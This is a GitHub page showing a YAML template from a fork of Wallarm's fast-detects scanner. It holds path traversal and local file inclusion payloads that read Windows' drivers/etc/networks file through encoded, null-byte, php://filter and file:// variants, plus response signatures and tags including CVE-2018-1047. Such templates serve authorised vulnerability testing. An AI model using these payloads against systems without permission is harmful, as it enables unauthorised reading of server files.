forked from wallarm/fast-detects
-
Notifications
You must be signed in to change notification settings - Fork 0
/
LFI-windows-replace.yaml
39 lines (37 loc) · 1.65 KB
/
LFI-windows-replace.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
generate:
- payload:
- 'c:\windows\system32\drivers\etc\networks'
- "../../../../../../../../../../../../../../../../windows/system32/drivers/etc/networks"
- "../../../../../../../../../../../../../../../../windows/system32/drivers/etc/networks\x00"
- "....//....//....//....//....//....//....//....//....//....//....//windows//system32//drivers//etc//networks"
- "....//....//....//....//....//....//....//....//....//....//....//windows//system32//drivers//etc//networks\x00"
- "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5cnetworks"
- "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5cnetworks%00"
- "php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../windows/system32/drivers/etc/networks"
- "php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../windows/system32/drivers/etc/networks\x00"
- file://c:\windows\system32\drivers\etc\networks
- file://c:\windows\system32\drivers\etc\networks\x00
- method:
- replace
detect:
- response:
- body: 'IyBDb3B5cmlnaHQgKGMpIDE5OTMtMTk5OSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBmaWxlIGNvb' #part of base64 < windows/system32/drivers/etc/networks
- body: '# campus 284.122.107'
meta-info:
- type: ptrav
- threat: 80
- tags:
- Path Traversal
- Arbitrary File Reading
- Misconfiguration
- Directory Listing
- Insecure Direct Object References
- Broken Access Control
- OWASP
- OWASP Top-10
- A4:2010
- A4:2013
- A5:2017
- JBOSS
- Wildfly
- CVE-2018-1047